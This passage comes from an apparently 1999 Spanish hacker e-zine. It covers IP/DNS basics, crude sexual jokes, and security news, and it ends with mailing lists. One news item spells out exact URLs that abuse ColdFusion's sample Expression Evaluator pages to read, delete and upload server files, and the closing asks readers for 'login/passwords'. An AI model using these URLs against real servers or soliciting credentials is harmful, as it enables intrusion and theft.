de informaci¢n y/o que se esperan m s bloques.
--------------------------------------------------------------------------------
     Todas las computadoras en Internet tienen una direcci¢n IP (Internet Protocol)
£nica. Esa direcci¢n IP es un conjunto de cuatro n£meros que pueden ser del 0
al 255 : Por Ejemplo, una direcci¢n IP es 200.13.16.38.
--------------------------------------------------------------------------------
     Ya que ese conjunto de n£meros es m s dif¡cil de recordar que un nombre,
claro est . Por tal raz¢n fue creado el Domain Name System (DNS), el cual es
un sistema que relaciona la direcci¢n IP de n£meros con un nombre de dominio
y que nos dice donde est  localizada dicha computadora. Por ejemplo,
en la direcci¢n http://www.listindiario.com.do , por consiguiente este es el
nombre del dominio.
--------------------------------------------------------------------------------

     Para entender la estructura y tener una idea
     m s clara de un dominio se debe tener en cuenta :


1) Leer de derecha a izquierda.

2) Los £ltimos caracteres en el ejemplo indican donde se localiza la compu-
tadora , que en este caso es Rep£blica Dominicana(do).

3) Siguiendo en el orden se¤alado , las siguientes letras indican el tipo de
dominio, que en este caso es comercial(com).

4) A continuaci¢n est  el nombre de la organizaci¢n (Dominicana).
Y finalmente el nombre de la computadora (www).
--------------------------------------------------------------------------------


        FTP(File Transfer Protocol), Protocolo de transferencia de archivos.
Este servicio permite transferir archivos de una computadora a otra. La
mayor¡a de las veces se usa FTP para copiar un archivo de un ordenador
remoto a su computadora. Este proceso se denomina carga. El proceso
inverso se denomina "descarga".
--------------------------------------------------------------------------------

       Algunos tipos de dominio que puedes encontrar en Internet son :
       <>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-

       com:  Organizaci¢n Comercial.
       edu:  Instituci¢n Educativa.
       gov:  Instituciones de Gobierno, excepto militares.
       mil:  Organizaciones Militares.
       net:  Proveedor de Servicios de Red.
       org:  Organizaciones no Lucrativas.
       

      Bueno hasta aqui los protocolos, para el proximo # continuaremos con la
segunda parte de este maravilloso tema.  

                					by MasterCrash
						           ~~~~~~~~~~~


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªªªªª
			ª        Humor        ª
			ªªªªªªªªªªªªªªªªªªªªªªª


     Hora de votar el estres despues de haber leido todas esas informaciones 
jugosas sobre hacking es justo algo de humor ¨no?  ;-D


                 Empleado Publico
                 ----------------

Una viejita entra corriendo a la comisaria:
-Oficial!, oficial!... me acaba de violar un empleado publico!.
-Pero... ¨como sabe que era un empleado publico?
-Porque tuve que hacer todo yo.

                  Etapas
                  ------

¨Sabes cuales son las 4 etapas de la mujer en la cama?

- No. ¨Cuales son?
- Bueno... son la asmatica, la matematica, la religiosa y la asesina.
- Ah... ¨si?... y, ¨como es eso?
- Mira... en la asmatica hace 'ah ah ah ah ah ah'... 
en la matematica 'mas, mas, mas...maaasss'... 
en la religiosa 'Ay diosito! ay diosito! ay diosito!'
- Ah... ¨y en la asesina?!
- Y... la asesina es cuando dice 'Si acabas ahora... te mato!!'


                   Paciente
                   --------

Un m‚dico recibe a un paciente, que se queja de estar muy agotado y ojeroso.
Luego de revisarlo, y sin encontrar nada en especial, el profesional comienza
el interrogatorio.

- ¨Ud. come bien?
- S¡.
- ¨Va bien de cuerpo?
- S¡.
- ¨Ud duerme bien?
- S¡.
- Ud., ¨este, es casado?
- S¡.
- Con su mujer, ¨todo bien?
- S¡, todo bien. Tres veces por d¡a, infaltablemente.
- Caramba, que bien. No muchos pueden decir lo mismo.
- Bueno, eso no es todo. Tengo una amiguita.
- Aj . ¨Tiene relaciones?
- Tres veces por d¡a, llueva o truene.
- Caramba. Ya van seis.
- Espere, Doctor. Tengo una secretaria muy buena...
- ¨Y tambi‚n?
- Tres veces por d¡a. Eso s¡, de lunes a viernes.
- Aj . ¨Eso es todo?
- Casi todo. En casa tengo una vecinita. La pobre es viuda,est  sola...
- Y Ud...
- Tres veces por d¡a, sin falta.
- Pero hombre -dijo el m‚dico ya molesto- yo ya tengo la causa de su problema.
Es m s que obvio. Ud., mi amigo, tiene demasiadas relaciones sexuales!
- ¨En serio, por eso? Menos mal, Doctor, me saca un peso de encima. Yo pens‚
que era por la paja.


                        Colmos
                        ------

Sabes ¨Cual es el colmo de un Quimico?
Estar todo el dia rodeado de botellas y no poderse beber ninguna.

¨Qu‚ hace un tipo vestido de vampiro conduciendo un tractor?
Intenta sembrar el p nico.


                         e-mail
                         -------

  Date: 20 de Abril de 1999
  Subject: Alerta de Virus!!!
  From: kSh E-zine
  To: ChikOs CaraBeliTas



        Hay un virus muy peligroso dando vueltas y se propaga a
trav‚s del correo electr¢nico. Si les llega un e-mail con el
siguiente subject: "Alerta de VIRUS!!!" no lo abran. Si lo hacen el
virus alterar  la segunda mitad de cualquier texto en su sistema.

   MUY IMPORTANTE: Si llegasen a infectarse con este virus, lo
   primero que tienen que hacer es oiufsd lkjswm kj wkjjk dslkj lrt
   a;ljkslrlkty kljl lkjl lkj fdslkj woijwe flvlmvl lkf lv lkjg lj
   lkjsdjl sdklj. sdfsd5 onbin5 lkjgldfj fgkldf glkjldf ldfkgj lgkjdf
   gkldg klgj gklj klf kj fgfgdgawpp fklwl fwlkjfww lkfjwlfwe lkfw efklwflk.



                               Religioso
                               ~~~~~~~~~

   Cristo durante la crucificci¢n:
   - Dimas, Dimas, acercate hijo m¡o.
   - No puedo se¤or, estoy atado a la cruz.
   - Gestas, Gestas, acercate hijo m¡o.
   - No puedo se¤or, tambien estoy atado.
   - Ok, Ok!. Pero si despues no salen en la foto no me reclamen... eh!



							by MasterCrash                             
						           ~~~~~~~~~~~


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


                                ªªªªªªªªªªªª
                                ª Noticias ª
                                ªªªªªªªªªªªª


Linux tendra su stand en Comdex 99
----------------------------------

El sistema operativo alternativo a Windows tendra un papel importante en la
feria Comdex este verano en Chicago.

La gigantesca exhibicion acogera un stand dedicado a todos los productos
relacionados con Linux. Adem s, los conocidos Linus Torvald y Bill Gates
har n conferencias en sus respectivos stands.

Esta sera la primera vez que el publico ver  a los dos grandes personajes
hablando de sus respectivos productos al mismo tiempo. Este duelo se presenta
de forma m s interesante que nunca, ya que el avance de Linux se hace cada vez
mas presente para Microsoft.



Melissa
-------            

Durante varios dias, "Melissa" ha acaparado la atencion de los medios
digitales de comunicacion.

Ciertamente, "Melissa"no era un virus especialmente da¤ino. No destruia datos
del ordenador ni alteraba el sistema. Existen, sin duda, virus mucho mas
destructivos. Pero su via de difusion, el correo electronico, le otorgo una
extension in‚dita en la historia de los virus -con el antecedente light del "
Happy 98"-; ese fue el motivo de preocupacion.

El virus "Melissa"ha demostrado la vulnerabilidad de una infraestructura
informatica excesivamente homogenea, caracterizada por el predominio del
software de Microsoft. Y cuanto mas homogeneo es un sistema, mas vulne-
rable se vuelve ante los ataques procedentes del exterior. Como en los
ecosistemas, la fortaleza y estabilidad de Internet esta en su diversidad.


Cae GSM
-------

­­­Por fin!!!. Una vez mas se demuestra que el oscurantismo no ayuda a
mantener un "secreto"a salvo.

Ya es posible clonar tarjetas SIM (Subscriber Identity Module). Es decir,
hacerse pasar por cualquier usuario GSM. No hace falta modificar el movil,
ya que los moviles son universales y la identidad la proporcionan las
tarjetas.

LA TARJETA ATACADA PERTENECE A LA RED DE pACIFIC bELL

El algoritmo referenciado como A5 en la especificacion GSM se
corresponde al algoritmo COMP128, al menos en muchas redes GSM
mundiales.

Los encargados de romper el codigo COMP128 (en menos de un dia), son
los mismos que encontraron un fallo de seguridad en la implementacion
SSL de las primeras versiones del Netscape Navigator.

Se puede encontrar una descripcion tecnica del ataque en:

http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html


NUEVOS ATAQUES, VIEJAS ARMAS 
----------------------------

Hace tan solo diez dias, docenas de ordenadores equipados con el buque
insignia de la casa (Windows NT), instalados en universidades y centros
gubernamentales de Estados Unidos (NASA incluida), mostraron la fatidica
pantalla azul que anuncia la caida total del sistema.

Se trataba de otro caso mas de ataque por denegacion de servicio:
paquetes de datos dirigidos a sistemas especificos a los que sobrecargan
hasta hacerlos caer. En esta ocasion volvieron a utilizarse unos viejos
conocidos : bonk, boink, teardrop, newtear y sus variantes.


Problema de seguridad en ICQ 99 
-------------------------------

Un problema de seguridad en el servidor del programa ICQ 99 permite que
cualquier archivo que cualquier archivo del disco duro del usuario sea copiado
a traves del navegador a partir de su direccion IP. El problema aparece cuando
el recurso Self-Hosted Personal Page del programa esta activado. Mirabilis,
empresa que invento originalmente el ICQ 99, a£n ha confirmado el problema.


Grave vulnerabilidad en servidores ColdFusion
---------------------------------------------

ColdFusion es un popular software de servidor de aplicaciones web,
ampliamente utilizado en entornos empresariales, para ofrecer
soluciones Internet e Intranet. En la instalacion de este producto
se configuran por defecto una serie de archivos de ejemplo y
documentacion en el servidor. Como ya ocurria con otros productos
similares, es posible realizar ataques a la maquina empleando dichas
paginas de demostracion.

Por defecto, al instalar la aplicacion de servidor web ColdFusion se
realiza la instalacion de codigo de ejemplo, asi como de documentacion
on-line. Como parte de esta coleccion se incluye una utilidad conocida
como Óxpression Evaluator", cuyo proposito es permitir a los
desarrolladores experimentar facilmente con las expresiones de
ColdFusion. Esta utilidad permite incluso crear un fichero de texto
en la maquina local, y subirlo al servidor para evaluarlo, aunque se
supone que esta limitada al servidor.

Basicamente existen tres archivos afectados por esta vulnerabilidad a
los cuales puede acceder cualquier usuario del web por defecto,

"/cfdocs/expeval/openfile.cfm",
"/cfdocs/expeval/displayopenedfile.cfm" y
"/cfdocs/expeval/exprcalc.cfm".

El primero de ellos permite subir un
archivo al servidor a traves de un formulario, el segundo graba el
archivo en la maquina, mientras que el £ltimo lee el archivo enviado,
muestra su contenido en una pagina web y despues borra el fichero.

Con todo esto cualquier usuario puede ver y borrar cualquier archivo
con total libertad. Por ejemplo, para ver y borrar un archivo como

"c:\winnt\repair\setup.log"basta con introducir en el navegador una URL como:
"http://www.servidor.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log".
Incluso se puede llegar mas lejos, primero se introduce la URL
"http://www.server.com/cfdocs/expeval/openfile.cfm", que permite
seleccionar un archivo de la maquina local para enviarlo al servidor.

Tras subir un fichero, este se mostrara en la pagina. La URL se vera como
"http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\archivo_enviado.txt".

Basta sustituir el ".\archivo_enviado.txt"por ÓxprCalc.cfm", para que
se borre este £ltimo archivo del servidor web. A partir de este momento
se podra usar ”penfile.cfm"para subir ficheros al servidor sin que
estos sean borrados posteriormente. Despues de esto, un usuario con
ciertos conocimientos de programacion en ColdFusion puede subir una
pagina que permita navegar por los directorios del servidor web y
enviar, recibir o borrar archivos. Incluso un ejecutable puede ser
situado en cualquier lugar al que el servicio ColdFusion tenga
acceso, con la posibilidad de instalar troyanos en el servidor.

Hay que destacar que los usuarios tienen acceso a todo el disco duro.
Muchos desarrolladores de ColdFusion emplean bases de datos en Access
para almacenar informacion para sus aplicaciones web. Si el sistema
esta afectado por esta vulnerabilidad, un atacante puede recibir
dichas bases de datos, e incluso sobreescribirlas con copias modificadas. 



							by MasterCrash                             
						           ~~~~~~~~~~~

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªª
			ª Listas de correo ª
			ªªªªªªªªªªªªªªªªªªªª


-RAREDUDEZ: La lista de Raregazz.

           Por lo que he podido comprobar es la mejor lista de correo 
(SOBRE HACKING) en espanol que existe para aclarar tus dudas , la idea es que los usuarios
realizen preguntas y que se contesten entre si, a la vez puedes informarte de
los ultimos bugs , tecnicas , e incluso hacer contactos !!!!!..

Para inscribirte, solo tienes que mandar un correo a :

raregazz@iname.com   con el subjet: suscribe tu@direccion.decorreo

para que te saquen de la lista :
raregazz@iname.com   con el subjet: unsuscribe tu@direccion.decorreo

-SET LIST:   La lista de SET, bien cool al igual que el primero, donde 

Para inscribirte, solo tienes que mandar un correo a :

set-subscribe@egroups.com.



							by MasterCrash                             
						           ~~~~~~~~~~~

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªªªªªªªªªªªª
			ª Resumen del Proximo Numero ª
			ªªªªªªªªªªªªªªªªªªªªªªªªªªªªªª


.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
LINUX, el David de los sistemas operativos. Repaso historico e introduccion
al OS Linux. 
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Criptografia y sus ramas             
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Guia del PGP, ¨Como se utiliza? ¨y por que debemos utilizarlo?    
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Mas sobre Protocolos. Tcp/IP
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Seguimos con los terminos Hackers.
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
BackOrifice II
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Enlaces a sitios relacionados con el hacking
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Humor
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
La llegada de un nuevo colaborador mi amigo y maestro "DarkLinux" 
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Y mucho mas...
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.




                                           				
				@%@%@%@%@%@%@%@%
			       (K)            (K)
			       (S)   FINISH   (S)
			       (H)            (H) 
				@%@%@%@%@%@%@%@%


	      Bueno es todo por el momento la mecha queda encendida, 
		necesitamos que colabores con articulos, tutoriales, 
                       login/passwords, etc. ­­cualquier cosa!!


                            Este no es final,
                            sino el inicio de
                            una larga travesia.
                            Ayudame a materializarla.




@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ KNOWLEDGE's SLAVES HACKER ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%






